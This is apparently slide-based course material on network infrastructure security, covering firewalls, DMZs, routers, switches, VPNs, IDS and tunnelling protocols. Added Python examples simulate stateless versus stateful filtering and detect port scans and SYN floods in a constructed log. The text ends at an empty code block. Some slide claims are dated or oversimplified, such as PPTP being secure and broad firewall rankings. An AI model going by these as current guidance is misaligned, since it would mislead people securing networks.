CIST 1601 Information Security Fundamentals
Chapter 3 Infrastructure and Connectivity
Collected and Compiled
By JD Willard
MCSE, MCSA, Network+,
Microsoft IT Academy Administrator
Computer Information Systems Technology
Albany Technical College
Understanding Infrastructure Security
Infrastructure security deals with the most basic aspect of how information flows and how work occurs in
your network and systems. This includes servers, networks, network devices, workstations, and the
processes in place to facilitate work.
Your network is composed of a variety of media and devices that both facilitate communications and
provide security.
Some of these devices (such as routers, modems, and PBX systems) provide external connectivity from
your network to other systems and networks.
Some of the devices (such as CD-Rs, disks, USB thumb drives, and tape) provide both internal archival
storage and working storage for your systems.
Networks are tied together using the Internet and other network technologies, thereby making them
vulnerable to any number of attacks.
To provide reasonable security, you must know how these devices work and how they
provide, or fail to provide, security.
Each time you add a device, change configurations, or switch technologies, you’re potentially altering the
fundamental security capabilities of your network.
The job of a security professional is to eliminate the obvious threats, to anticipate how the next creative
assault on your infrastructure might occur, and to be prepared to neutralize it before it happens.
A network is no more secure than its weakest node.
Working with Hardware Components
Network hardware components include physical devices such as routers, servers, firewalls, workstations, and switches.
From a security perspective you must evaluate your network from the standpoint of each and every device within it.
It cannot be overstated: The complexity of most networks makes securing them extremely complicated.
To provide reasonable security, you must evaluate every device to determine its unique strengths and vulnerabilities.
Network Separation (2:52)
This network has Internet connections. Internet connections expose your network to the highest number of external threats. These threats can come from virtually any location worldwide.
Working with Software Components
Hardware exists to run software. The software is intended to make the
hardware components easy to configure and easy to support, however, that
software can also make the hardware easy to bypass.
Network infrastructure includes servers and workstations running operating
systems, routers, firewalls, and dedicated devices that have their own
communications and control programs. This situation leaves networks open to
attacks and security problems because many of these systems work
independently.
Many larger organizations have built a single area for network monitoring and
administrative control of systems called a Network Operations Center (NOC).
This centralization lets you see a larger overall picture of the network, and it lets
you take actions on multiple systems or network resources if an attack is under
way. Using a NOC makes it easier to see how an attack develops and to provide
countermeasures.
NOCs are expensive and require a great deal of support: factors beyond the
economy or scale of all but the largest businesses. After a NOC is developed and
implemented it must be constantly evaluated and changed as needed.
Understanding the Different Network
Infrastructure Devices - Firewalls
Firewalls, Routers, and Switches (7:47)
All-in-one Security Appliances and Spam Filters (2:36)
A firewall is a component placed on computers and networks to help eliminate
undesired access by the outside world. It can be composed of hardware, software, or a
combination of both.
Firewalls are the front line defense devices for networks that are connected to the
Internet.
A firewall protects hosts on an internal private network from attackers on an external public
network by:
Packet filtering
Port filtering
IP address filtering
A software firewall is a program that runs within an OS, such as Linux, Unix, or Windows.
With a software firewall, adding interfaces is as easy as adding and configuring another
NIC. It is easier to make configuration errors in a software firewall.
A hardware firewall is also referred to as an appliance firewall. Appliance firewalls are
often designed as stand-alone black box solutions that can be plugged in to a network
and operated with minimal configuration and maintenance. A hardware firewall is
purchased with a fixed number of interfaces available. Hardware firewalls outperform
and generally provide increased security over software firewalls.
Packet Filter Firewalls
Firewall Rules (7:57)
A packet-filtering firewall is typically a router and operates at the Network layer of the
OSI model.
A packet filtering firewall only looks at a data packet to obtain the source and destination
addresses and the protocol and port used. This information is then compared to the
configured packet filtering rules to decide if the packet will be dropped or forwarded to
its destination. A packet filtering firewall only examines the packet header information,
not the data or payload.
Packet filters examine each incoming (and usually outgoing) packet, then pass or discard
it based on these network data packet fields:
Source and destination IP address
Specified port numbers
Specific protocols (TCP, UDP, ICMP)
Packet-filtering solutions are generally considered less secure firewalls because they still
allow packets inside the network, regardless of the communication pattern within the
session.
The packet-filtering firewall provides high performance.
Proxy Firewalls
Proxy firewalls serve as go-betweens for the network
and the Internet by processing requests received from
external networks and reprocessing them for use
internally.
This type of firewall has a set of rules that the packets
must pass to get in or out.
The primary security feature of a proxy firewall is that
it hides the client information.
It can be used to hide the internal addresses from the
outside world through Network Address Translation
(NAT), which does not allow the computers on the network
to directly access the Internet.
NAT hides a packet’s IP address before sending it
through another network. The NAT device is the only
computer on the network that communicates with
untrusted computers.
If the organization is using the proxy server for both
Internet connectivity and web content caching, the
proxy server should be placed between the internal
network and the Internet, with access for users who
are requesting the web content.
A proxy-based firewall provides greater network
isolation than a stateful firewall.
A proxy firewall blocking network
access from external networks
Proxy Firewalls
Web Application Firewalls (3:05)
An application firewall is typically integrated into another type of firewall to
filter traffic that is traveling at the Application layer of the OSI model.
The proxy function can occur at either the application level or the circuit level.
An application firewall creates a virtual circuit between the firewall clients.
Each protocol has its own dedicated portion of the firewall that is concerned
only with how to properly filter that protocol’s data.
This type of server is advanced and must know the rules and capabilities of the
protocol used.
A unique application-level proxy server must exist for each protocol supported.
Unlike a circuit-level firewall, an application-level firewall does not examine the
IP address and port of the data packet.
An application-level proxy firewall is most detrimental to network performance
because it requires more processing per packet.
Proxy Firewalls
A proxy firewall typically uses two
network interface cards (NICs). This
type of firewall is referred to as a
dual-homed firewall.
Dual-homed computers have two
NICs installed, each connected to a
separate network.
A dual-homed firewall has two
network interfaces.
One interface connects to the public
network, usually the Internet.
The other interface connects to the
private network.
The forwarding and routing function
should be disabled on the firewall to
ensure that network segregation
occurs.
A dual-homed firewall segregating two
networks from each other
Stateful Inspection Firewalls
Stateful inspection is also referred to as stateful packet filtering.
A stateful-inspection firewall, a combination of all types of firewalls, is suited for main
perimeter security. Stateful-inspection firewalls can thwart port scanning by closing off
ports until a connection to the specific port is requested.
Stateful inspection firewalls work at the Network Layer to provide an additional layer of
security and also monitor the state of each connection.
Most of the devices used in networks don’t keep track of how information is routed or
used. After a packet is passed, the packet and path are forgotten. In stateful packet
filtering, records are kept in a state table that tracks every communications channel.
Stateful inspections provide additional security, especially in connectionless protocols
such as UDP and ICMP.
Denial-of-service (DoS) attacks present a challenge because flooding techniques are used
to overload the state table and effectively cause the firewall to shut down or reboot.
Stateful and circuit-level proxy firewalls, while slower than packet-filtering firewalls, offer
better performance than application-level firewalls.
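To make the difference between the two designs concrete, here is an added simulation (not code from the slides or from any firewall product) of a header-only packet filter beside a stateful firewall that keeps a 5-tuple state table. The rule set, the addresses and the deliberately tiny state-table cap used to show table exhaustion are all constructed for this example.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass(frozen=True)
class Packet:
    """Only the header fields a packet filter looks at; the payload is never inspected."""
    proto: str          # "tcp", "udp" or "icmp"
    src: str
    dst: str
    sport: int = 0
    dport: int = 0
    syn: bool = False   # TCP SYN set: a new connection request
    ack: bool = False   # TCP ACK set: part of an existing exchange


@dataclass(frozen=True)
class Rule:
    action: str                    # "allow" or "deny"
    proto: str                     # "tcp", "udp", "icmp" or "any"
    src: str                       # CIDR network or "any"
    dst: str                       # CIDR network or "any"
    dport: Optional[int] = None    # None matches every destination port

    def matches(self, pkt: Packet) -> bool:
        if self.proto != "any" and self.proto != pkt.proto:
            return False
        if self.src != "any" and ip_address(pkt.src) not in ip_network(self.src):
            return False
        if self.dst != "any" and ip_address(pkt.dst) not in ip_network(self.dst):
            return False
        return self.dport is None or self.dport == pkt.dport


class PacketFilter:
    """Stateless filter: first matching rule wins, implicit deny at the end."""
    def __init__(self, rules):
        self.rules = list(rules)

    def decide(self, pkt: Packet) -> str:
        for rule in self.rules:
            if rule.matches(pkt):
                return rule.action
        return "deny"


class StatefulFirewall(PacketFilter):
    """Same rules, plus a state table keyed on the 5-tuple of each tracked session."""
    def __init__(self, rules, inside: str, max_states: int = 10000):
        super().__init__(rules)
        self.inside = ip_network(inside)
        self.max_states = max_states    # table capacity; flooding aims to fill it
        self.state = set()

    def decide(self, pkt: Packet) -> str:
        outbound = ip_address(pkt.src) in self.inside
        # Normalise the key so a reply maps onto the same entry as its request.
        key = ((pkt.proto, pkt.src, pkt.sport, pkt.dst, pkt.dport) if outbound
               else (pkt.proto, pkt.dst, pkt.dport, pkt.src, pkt.sport))
        if key in self.state:
            return "allow"                  # reply within a tracked session
        if not outbound and pkt.proto == "tcp" and not pkt.syn:
            return "deny"                   # unsolicited non-SYN from outside
        if super().decide(pkt) != "allow":
            return "deny"
        if len(self.state) >= self.max_states:
            return "deny"                   # table exhausted: no new sessions
        self.state.add(key)
        return "allow"


# Constructed rule set: inbound web traffic to the 10.0.0.0/24 segment, anything outbound.
RULES = [
    Rule("allow", "tcp", "any", "10.0.0.0/24", dport=80),
    Rule("allow", "any", "10.0.0.0/24", "any"),
]


def demo(max_states: int = 2) -> dict:
    """Run the same packets through both firewalls; returns (stateless, stateful) per case."""
    stateless = PacketFilter(RULES)
    stateful = StatefulFirewall(RULES, "10.0.0.0/24", max_states=max_states)
    cases = {
        # Legitimate inbound web request: both allow.
        "web_syn": Packet("tcp", "198.51.100.7", "10.0.0.10", 51000, 80, syn=True),
        # ACK-only packet to port 80 with no session: the header matches the rule, so the
        # stateless filter lets it in; the stateful firewall has no entry for it.
        "web_ack_no_session": Packet("tcp", "198.51.100.8", "10.0.0.10", 51000, 80, ack=True),
        # Outbound HTTPS request from a workstation, then the server's reply.
        "out_syn": Packet("tcp", "10.0.0.5", "203.0.113.9", 40000, 443, syn=True),
        "reply": Packet("tcp", "203.0.113.9", "10.0.0.5", 443, 40000, ack=True),
        # Same outside host, but aimed at a port nobody opened a session from.
        "spoofed_reply": Packet("tcp", "203.0.113.9", "10.0.0.5", 443, 40001, ack=True),
        # A third session when the (deliberately tiny) state table is already full.
        "out_syn_table_full": Packet("tcp", "10.0.0.6", "203.0.113.9", 40002, 443, syn=True),
    }
    return {name: (stateless.decide(p), stateful.decide(p)) for name, p in cases.items()}


if __name__ == "__main__":
    for name, (a, b) in demo().items():
        print(f"{name:22} stateless={a:5} stateful={b}")
```

The "reply" case shows why a stateless filter needs extra inbound rules (and therefore holes) to let replies back in, while the stateful table admits only replies to sessions it has seen.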
Firewalls and DMZs
Firewalls can be used to create demilitarized
zones (DMZs).
A DMZ is a network segment placed between
an internal (private) network and an external
(public) network, such as the Internet.
Typically, either one or two firewalls are used to
create a DMZ.
A DMZ implemented with one firewall
connected to a public network, a private
network and a DMZ segment is cheaper to
implement than a DMZ implemented with two
firewalls.
A DMZ with a firewall on each end is typically
more secure than a single-firewall DMZ.
The main objective for the placement of
firewalls is to allow only traffic that the
organization deems necessary and provide
notification of suspicious behavior.
Hubs
Physical Port Security (5:24)
Hubs act as a central connection point for network devices on one
network segment. Hubs are used to extend the length of network
beyond the cable’s maximum segment distance. They work at the
Physical layer of the OSI model.
Hubs are network devices that allow many hosts to inter-communicate
through the usage of physical ports. This makes hubs central connectivity
devices and prone to being attacked. Traffic sent to one port is
regenerated to all other ports.
Hubs do not provide data isolation between endpoint ports: any node can
observe the data traffic to and from all other nodes on the same device.
This gives attackers the opportunity to inspect network traffic and intercept
user credentials, security encryption traffic, and other forms of sensitive
transmitted data.
Hubs are considered highly insecure.
Modems
A modem is a hardware device that connects the digital signals from a computer to the
analog telephone line. It allows these signals to be transmitted longer distances than are
possible with digital signals.
The word "modem" is an amalgam of the words "modulator" and "demodulator," which
are the two functions that occur during transmission.
Modems present a unique set of challenges from a security perspective.
Leaving modems open for incoming calls with little to no authentication for users dialing
in can be a clear security vulnerability in the network. For example, war-dialing attacks
take advantage of this situation. War-dialing is the process by which an automated
software application is used to dial numbers in a given range to determine whether any
of the numbers are serviced by modems that accept dial-in requests.
Setting the callback features to have the modem call the user back at a preset number
and using encryption and firewall solutions will help keep the environment safe from
attacks.
Monitor computers that have modems to check whether they have been compromised.
Check for software updates for computers that have modems.
Remove all unnecessary modems from computers.
Remote Access Services
Remote access servers (RAS) allow clients to use dial-up
connections and network technologies to access servers and
internal networks. RAS connections are achieved through dial-up, DSL, VPNs, cable modems and ISDN.
Remote Access (2:50)
Client systems with a modem can connect using normal dial-up connections to a properly equipped remote access
server, which functions as a gateway through which the
remote user may access local resources or gain connectivity to
the Internet.
The RAS environment is vulnerable to public PBX
infrastructure vulnerabilities, RAS software bugs, buffer
overflows, and social engineering. You should apply vendor
security patches as soon as they are available to protect
against RAS software bugs. Social engineering and the public
PBX infrastructure are common methods used by intruders to
access your RAS environment.
Typical methods of securing remote access servers:
Implementing a strong authentication method or two-factor
authentication
Limiting which users are allowed to dial in and limiting the dial-in hours
Implementing account lockout and strict password policies
Implementing a real-time alerting system
Allowing dial-in only and forcing callback to a preset number
are strategies for securing remote access servers (RAS).
A RAS connection between a remote
workstation and a Windows server
Routers
Routers enable connectivity between two or more networks and can
connect multiple network segments into one network.
Routers operate at the Network Layer (Layer 3) by using IP addresses to
route packets to their destination along the most efficient path.
Routers store information about network destinations in routing tables.
Routing tables contain information about known hosts on both sides of
the router.
Routers can be configured in many instances to act as packet-filtering
firewalls. When configured properly, they can prevent unauthorized
ports from being opened.
Routers are the first line of defense and should therefore be configured
to forward only traffic that is authorized by the network administrator.
Access entries can be specified to allow only authorized traffic and deny
unauthorized traffic.
Methods for securing routers:
Routers should be kept in locked rooms
You should use complex passwords for administrative consoles
Routers should be kept current with the latest available vendor security
patches
Configure access list entries to prevent unauthorized connections and
routing of traffic
Use monitoring equipment to protect connection points and devices
Secure Router Configuration (2:38)
Routers
Routers, in conjunction with a CSU/DSU, are also used to translate LAN to WAN framing. Such routers are
referred to as border routers. Border routers decide who can come in and under what conditions.
Dividing internal networks into two or more subnets is a common use for routers.
Routers can also be connected internally to other routers, effectively creating autonomous zones. This type
of connection keeps local network traffic off the network backbone and provides additional security
internally.
Routers establish routing tables. A router contains information about the networks connected to it and
where to send requests if the destination is unknown. These tables grow as connections are made through
the router.
Routers communicate routing information using three standard protocols:
Routing Information Protocol (RIP) is a simple protocol that is part of the TCP/IP protocol suite. Routers that use
RIP routinely broadcast the status and routing information of known routers. RIP also attempts to find routes
between systems using the smallest number of hops or connections.
Border Gateway Protocol (BGP) allows groups of routers to share routing information.
Open Shortest Path First (OSPF) allows routing information to be updated faster than with RIP.
Switches
Switch Port Security and 802.1X (5:35)
Switches can be used to connect multiple LAN segments. Switches operate at the Data
Link layer of the OSI model (Layer 2), using the MAC address to send packets to their
destination.
Switches create virtual circuits between systems in a network. These virtual circuits are
somewhat private and reduce network traffic when used. Virtual circuits are more
difficult to examine with network monitors.
Only packets destined for the computer on a particular port of a switch can be seen.
With computers connected through a switch, eventually any individual computer would
be exposed to only traffic destined for that particular computer or for all computers.
Therefore, any port would be able to see only traffic destined for it and broadcasts.
Switches are used to create security segments on a LAN through the implementation of
VLANs.
VLAN Management (3:44)
Physical access control to the networking closet is critical to protect switched networks
against any exposed supervisory ports that can be exploited by an attacker.
Methods for securing switches:
Switches should be kept in locked rooms
You should use complex passwords for administrative consoles
Switches should be kept current with the latest available vendor security patches
Use monitoring equipment to protect connection points and devices
Telecom/PBX Systems
Many modern PBX (private branch exchange) systems integrate voice
and data onto a single data connection to your phone service provider.
These connections are made using existing network connections such
as a T1 or T3 network.
A PBX provides a connection to the public switched telephone network
(PSTN) and provides telephone extensions for employees. A PBX is a
programmable telephone switch that is typically located on a
company’s premises. A PBX can usually be remotely administered.
For years, PBX-type systems have been targeted by hackers, mainly to
get free long-distance service. The vulnerabilities that phone networks
are subject to include social engineering, long-distance toll fraud, and
breach of data privacy.
To protect a PBX from hacker attacks:
Make sure the PBX is in a secure area
Limit the number of entry points
Change default passwords
Only allow authorized maintenance
Remote PBX administration should require user names and passwords
The telephone number used to remotely administer a PBX should be
unlisted
Block all toll numbers and limit long-distance calling
Implement a PBX password change and audit policy
Many times, hackers can gain access to the phone system via social
engineering because this device is usually serviced through a remote
maintenance port.
A modern digital PBX system
integrating voice and data onto a
single network connection
Virtual Private Networks
VPNs are used to make
connections between private
networks across a public
network.
VPN connections provide a
mechanism for the creation of
a secured “tunnel” through a
public network such as the
Internet using a tunneling
protocol, such as L2TP or PPTP.
These connections are not
guaranteed to be secure
unless an encryption
system, such as IPSec, is used.
VPN Concentrators (2:06)
VPN Server in Front of the Firewall
With the VPN server in front of the firewall
attached to the Internet you need to add packet
filters to the Internet interface that only allow VPN
traffic to and from the IP address of the VPN
server's interface on the Internet.
For inbound traffic, when the tunneled data is
decrypted by the VPN server it is forwarded to the
firewall, which employs its filters to allow the traffic
to be forwarded to intranet resources.
Because the only traffic that is crossing the VPN
server is traffic generated by authenticated VPN
clients, firewall filtering in this scenario can be used
to prevent VPN users from accessing specific
intranet resources.
Because the only Internet traffic allowed on the
intranet must go through the VPN server, this
approach also prevents the sharing of File Transfer
Protocol (FTP) or Web intranet resources with non-VPN Internet users.
For the Internet interface on the VPN server, configure
the input and output filters using the Routing and
Remote Access snap-in.
VPN Server Behind the Firewall
More commonly, the firewall is connected to the
Internet and the VPN server is another intranet
resource connected to a DMZ. The VPN server has an
interface on the DMZ and an interface on the intranet.
In this approach, the firewall must be configured with
input and output filters on its Internet interface to allow
the passing of tunnel maintenance traffic and tunneled
data to the VPN server. Additional filters can allow the
passing of traffic to Web servers, FTP servers, and other
types of servers on the DMZ.
The firewall does not have the encryption keys for each
VPN connection so it can only filter on the plaintext
headers of the tunneled data, meaning that all
tunneled data passes through the firewall. No problem,
because the VPN connection requires an authentication
process that prevents unauthorized access beyond the
VPN server.
When you deploy a VPN gateway in its own DMZ behind
the external firewall, you receive the following benefits:
The firewall can protect the VPN gateway
The firewall can inspect plain text from the VPN
Internet connectivity does not depend on the VPN
gateway
In this deployment, the following drawbacks are
experienced:
The firewall will need special routes to the VPN gateway
configured
Roaming client support is hard to achieve
For the Internet interface on the firewall, input
and output filters need to be configured using the
firewall's configuration software.
Wireless Access Points
To build a wireless network:
On the client side, you need a wireless NIC
On the network side, you need a wireless
access point (WAP)
A wireless access point (WAP) is a low-power
transmitter/receiver, also known as a
transceiver, which is strategically placed for
access.
The portable device and the access point
communicate using one of several
communications protocols, including IEEE
802.11 (also known as Wireless Ethernet).
Wireless offers mobile connectivity within a
campus, a building, or even a city.
Wireless communications, although
convenient, can also be less than secure.
While many WAPs now ship with encryption
on, you will still want to verify that this is the
case with your network.
A wireless portal being used to
connect a computer to a company
network. Notice that the portal
connects to the network and is
treated like any other connection
used in the network.
Monitoring and Diagnosing Networks
Network Monitors
Network monitors, otherwise called sniffers, were
originally introduced to help troubleshoot network
problems.
Examining the signaling and traffic that occurs on a
network requires a network monitor.
Network monitors are now available for most
environments, and they’re effective and easy to use.
Today, a network-monitoring system usually consists of
a PC with a NIC (running in promiscuous mode) and
monitoring software.
Microsoft Network Monitor is a packet analyzer. It
enables capturing, viewing, and analyzing network data
and deciphering network protocols. It can be used to
troubleshoot network problems and applications on the
network.
The monitoring software is menu driven, easy to use,
and has a big help file.
The traffic displayed by sniffers can become overly
involved and require additional technical materials
which you can find on the Internet for free.
With a few hours of work, most people can make
network monitors work efficiently and use the data
they present.
Microsoft Network Monitor
Monitoring and Diagnosing Networks
Intrusion Detection Systems
An IDS (Intrusion Detection System) is a hardware device with software that monitors
events in a system or network to identify when intrusions are taking place. IDSs are
designed to analyze data, identify attacks, and respond to the intrusion.
An IDS can run on network devices and on individual workstations. You can configure
the IDS to monitor for suspicious network activity, check systems logs, perform
stateful packet matching, and disconnect sessions that are violating your security
policy.
An IDS is used to protect and report network abnormalities to a network administrator
or system. It works with audit files and rule-based processing to determine how to act
in the event of an unusual situation on the network.
IDSs are different from firewalls in that firewalls control the information that gets in
and out of the network, whereas IDSs can identify unauthorized activity. IDSs are also
designed to catch attacks in progress within the network, not just on the boundary
between private and public networks.
If the firewall were compromised, the IDS would notify you based on rules it’s
designed to implement.
In the event the firewall is compromised or penetrated, the IDS can react by disabling
systems, ending sessions, and even potentially shutting down your network.
The main types are a host-based IDS system and network IDS system.
With a host-based IDS system, software runs on the host computer system
to monitor machine logs, system logs, and how applications inter-operate.
With a network IDS, the IDS checks for network traffic and traffic patterns
that could be indicative of attacks such as port scan and denial-of-service
attacks.
Log Analysis (2:33)
An IDS and a firewall working
together to secure a network
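As an added illustration of the network-IDS patterns listed above (port scans and denial-of-service floods), and not code from the slides or from any IDS product, the following detector reads connection-log lines and raises one alert per source/target pair for a port scan and one per target for a SYN flood. The log format, the thresholds and the addresses are assumptions constructed for this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# One line per inbound TCP SYN seen by the sensor; the format is constructed for this example.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) SYN (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_line(line: str):
    """Return the fields of one log line, or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "src": m["src"],
            "dst": m["dst"], "dport": int(m["dport"])}


def detect(lines, scan_ports=10, scan_window=60, flood_syns=100, flood_window=1):
    """Sliding-window rules: a port scan is one source touching >= scan_ports distinct
    ports on one host within scan_window seconds; a SYN flood is >= flood_syns SYNs
    to one host within flood_window seconds, whatever the sources."""
    alerts = []
    scan_hist = defaultdict(deque)    # (src, dst) -> deque of (ts, dport)
    flood_hist = defaultdict(deque)   # dst -> deque of ts
    raised = set()                    # alert once per (kind, key), not once per packet
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ts = ev["ts"]
        pair = (ev["src"], ev["dst"])
        hist = scan_hist[pair]
        hist.append((ts, ev["dport"]))
        while (ts - hist[0][0]).total_seconds() > scan_window:
            hist.popleft()
        ports = {p for _, p in hist}
        if len(ports) >= scan_ports and ("PORT_SCAN", pair) not in raised:
            raised.add(("PORT_SCAN", pair))
            alerts.append(("PORT_SCAN", ev["src"], ev["dst"], len(ports), ts))
        fh = flood_hist[ev["dst"]]
        fh.append(ts)
        while (ts - fh[0]).total_seconds() > flood_window:
            fh.popleft()
        if len(fh) >= flood_syns and ("SYN_FLOOD", ev["dst"]) not in raised:
            raised.add(("SYN_FLOOD", ev["dst"]))
            alerts.append(("SYN_FLOOD", "*", ev["dst"], len(fh), ts))
    return alerts


def make_sample_log():
    """Constructed traffic (not a real capture): a normal client, a sequential port scan
    from one host, and a burst of SYNs to the web server from many addresses."""
    t0 = datetime(2024, 5, 1, 10, 0, 0)
    fmt = "{ts:%Y-%m-%dT%H:%M:%S} SYN {src}:{sport} -> {dst}:{dport}"
    lines = []
    for i in range(3):            # benign: three HTTPS connections to the same port
        lines.append(fmt.format(ts=t0 + timedelta(seconds=i), src="192.0.2.20",
                                sport=50000 + i, dst="10.0.0.10", dport=443))
    for port in range(20, 32):    # scan: 12 distinct ports in 12 seconds
        lines.append(fmt.format(ts=t0 + timedelta(seconds=port), src="198.51.100.7",
                                sport=40000 + port, dst="10.0.0.20", dport=port))
    for i in range(120):          # flood: 120 SYNs in one second from 120 sources
        lines.append(fmt.format(ts=t0 + timedelta(minutes=5), src=f"203.0.113.{i}",
                                sport=1024 + i, dst="10.0.0.10", dport=80))
    return lines


if __name__ == "__main__":
    for alert in detect(make_sample_log()):
        print(alert)
```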
Securing Workstations and Servers
Workstations are particularly vulnerable in a network. Workstations communicate using
services such as file sharing, network services, and applications programs. Many of these
programs have the ability to connect to other workstations or servers. These connections
are potentially vulnerable to interception and exploitation.
The process of making a workstation or a server more secure is called platform
hardening. The process of hardening the operating system is referred to as OS hardening.
Platform hardening procedures can be categorized into three basic areas:
Remove unused software, services, and processes from the workstations (for example, remove the
server service from a workstation). These services and processes may create opportunities for
exploitation.
Ensure that all services and applications are up-to-date, including available service and security
packs, and configured in the most secure manner allowed. This may include assigning passwords,
limiting access, and restricting capabilities.
Minimize information dissemination about the operating system, services, and capabilities of the
system. Many attacks can be targeted at specific platforms once the platform has been identified.
Many operating systems use default account names for administrative access. If at all possible, these
should be changed. During a new installation of Windows Vista or Windows XP, the first user created
is automatically added to the administrators group. Windows Vista then goes one step further and
automatically disables the actual administrator account once another account belonging to the
administrators group has been created.
Understanding Mobile Devices
Mobile devices, including pagers and personal
digital assistants (PDAs), use either RF signaling
or cellular technologies for communication. If
the device uses the Wireless Application
Protocol (WAP), the device in all likelihood
doesn’t have security enabled. Several levels of
security exist in the WAP protocol:
Anonymous authentication, which allows
virtually anyone to connect to the wireless portal
Server authentication, which requires the
workstation to authenticate against the server
Two-way (client and server) authentication,
which requires both ends of the connection (client
and server) to authenticate to confirm validity
Many new wireless devices are also capable of
using certificates to verify authentication.
The Wireless Session Protocol (WSP) manages
the session information and connection between
the devices.
The Wireless Transaction Protocol (WTP)
provides services similar to TCP and UDP for WAP.
The Wireless Datagram Protocol (WDP) provides
the common interface between devices.
Wireless Transport Layer Security (WTLS) is the
security layer of the Wireless Application Protocol.
A mobile environment using WAP
security. This network uses both
encryption and authentication to
increase security.
Understanding Remote Access
Using Point-to-Point Protocol
Point-to-Point Protocol (PPP) offers multiple protocol
support including AppleTalk, IPX, and DECnet, and is widely
used today as a transport protocol for dial-up connections.
PPP is a protocol for communicating between two points
using a serial interface, and it provides service at layer 2 of the
OSI model. PPP can handle both synchronous and
asynchronous connections.
PPP provides no security. PPP is primarily intended for dial-up connections and should never be used for VPN
connections.
PPP works with POTS, Integrated Services Digital Network
(ISDN), and other faster connections such as T1.
PPP does not provide data security, but it does provide
authentication using Challenge Handshake Authentication
Protocol (CHAP). CHAP can be used to provide on-demand
authentication within an ongoing data transmission.
A dial-up connection using PPP works well because it isn’t
common for an attacker to tap a phone line. You should
make sure all your PPP connections use secure channels,
dedicated connections, or dial-up connections.
PPP using a single B channel on
an ISDN connection. In the case
of ISDN, PPP would normally use
one 64Kbps B channel for
transmission.
Understanding Remote Access
Working with Tunneling Protocols
Tunneling protocols add a capability to the
network:
The ability to create tunnels between networks that
can be more secure, support additional protocols, and
provide virtual paths between systems.
The three primary tunneling protocols are PPTP
(Point-to-Point Tunneling Protocol), L2TP (Layer 2
Tunneling Protocol) and L2F (Layer 2 Forwarding
protocol).
Working with Tunneling Protocols
Point-to-Point Tunneling Protocol
Point-to-Point Tunneling Protocol (PPTP) was created by Microsoft to work with the
Point-to-Point Protocol (PPP) to create a virtual Internet connection so that networks can
use the Internet as their WAN link.
PPTP is known as a tunneling protocol because the PPTP protocol dials through the PPP
connection, which results in a secure connection between client and server.
This connectivity method creates a virtual private network (VPN), allowing for private
network security. In effect PPTP creates a secure WAN connection using dial-up access.
PPTP supports encapsulation in a single point-to-point environment. PPTP encapsulates
and encrypts PPP packets. This makes PPTP a favorite low-end protocol for networks.
The negotiation between the two ends of a PPTP connection is done in the clear. Once
the negotiation is performed, the channel is encrypted. A packet-capture device, such as
a sniffer, that captures the negotiation process can potentially use that information to
determine the connection type and information about how the tunnel works.
Working with Tunneling Protocols
Layer 2 Forwarding
L2F was created by Cisco as a method of creating tunnels, primarily for dial-up
connections. L2F tunnels PPP frames much as PPTP does, but it provides authentication only;
it does not provide encryption, so it should not be used on its own across untrusted WAN links.
Layer 2 Tunneling Protocol
Layer Two Tunneling Protocol (L2TP) is the successor to PPTP and L2F. It can be used
between LANs and can also be used to create a VPN, and it is primarily a point-to-point protocol.
Microsoft and Cisco agreed to combine their respective tunneling protocols into one IETF
standard (RFC 2661, 1999): the Layer Two Tunneling Protocol (L2TP). L2TP is a hybrid of
PPTP and L2F.
L2TP supports multiple network protocols and can be used in networks besides TCP/IP:
because it carries PPP frames, the tunneled payload may be IP, IPX or SNA, and L2TP itself
can run over IP, Frame Relay or ATM.
L2TP isn't secure on its own; it provides no encryption, so use IPsec with it (L2TP/IPsec,
RFC 3193) to provide encryption of the data.
L2TP operates at the Data Link layer of the OSI model and uses UDP for sending packets
as well as for maintaining the connection. L2TP uses UDP port number 1701. In L2TP/IPsec that
UDP traffic is in turn protected by ESP, and the IKE key exchange runs on UDP 500 (4500 with NAT
traversal).
Secure Shell
Secure Shell (SSH) is a type of tunneling protocol that allows access to remote systems in a secure manner.
SSH was originally designed for UNIX systems. SSH secures the session between the client and the server: the
server proves its identity with a host key, the session is encrypted, and both authentication information
(passwords or public keys) and data are protected during terminal connections. SSH also provides secure
replacements for Telnet, rlogin, FTP (via SFTP and scp) and many other communications-oriented programs under
UNIX, and its port-forwarding feature can tunnel other TCP services through the encrypted session.
SSH uses TCP port 22. Verify a server's host-key fingerprint the first time you connect; accepting an unknown
key blindly leaves the session open to a man-in-the-middle.
Internet Protocol Security
IPsec (Internet Protocol Security) is not itself a tunneling protocol, but it is used in conjunction with
tunneling protocols (as in L2TP/IPsec), and in its own tunnel mode, to provide network security. IPsec is
oriented primarily toward LAN-to-LAN (gateway-to-gateway) and host-to-gateway connections rather than
dial-up connections.
IPsec can authenticate packet headers and can encrypt and encapsulate packets. IPsec provides both
authentication and encryption, and is regarded as one of the strongest security standards.
When the Authentication Header (AH, IP protocol 51) is used, IPsec provides integrity and origin
authentication for the header and payload with a keyed hash (an HMAC, not a digital signature) but no
confidentiality. When the Encapsulating Security Payload (ESP, IP protocol 50) is used, IPsec encrypts the
payload and, with an integrity algorithm, authenticates it as well. Keys and algorithms are negotiated by
IKE over UDP 500/4500. Because AH covers the IP addresses it cannot traverse NAT, so ESP is what is deployed
almost everywhere.
IPsec protects any traffic carried over IP regardless of the upper-layer protocol (TCP, UDP,
ICMP and so on); it does not run over non-IP networks. It has two modes of security:
Tunnel mode is used for VPNs over an unsecured public network. In tunnel mode the
entire original packet, headers included, becomes the payload of a new IP packet whose
outer header carries the gateways' addresses, so the inner addresses and payload are both
hidden. Two routers that require secure communications between their networks should use
IPsec in tunnel mode.
Transport mode is used for host-to-host protection, typically over owner-controlled
networks such as a LAN. In transport mode only the payload is encrypted; the original IP
header stays in the clear (with its protocol field changed to ESP or AH) and the packet is not
encapsulated.
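The difference between the two modes is easiest to see on the wire. The following is an added example, not course material: it builds an ESP packet in transport mode and in tunnel mode around a constructed inner IPv4/UDP packet and shows what each mode leaves visible. The cipher is a deliberately labelled toy (a SHA-256 counter-mode keystream standing in for AES) and the keys are hard-coded where IKE would normally supply them; the ESP framing (SPI, sequence number, padding trailer, truncated HMAC ICV) follows RFC 4303, and the 20-byte IP headers carry no options and no checksum.

```python
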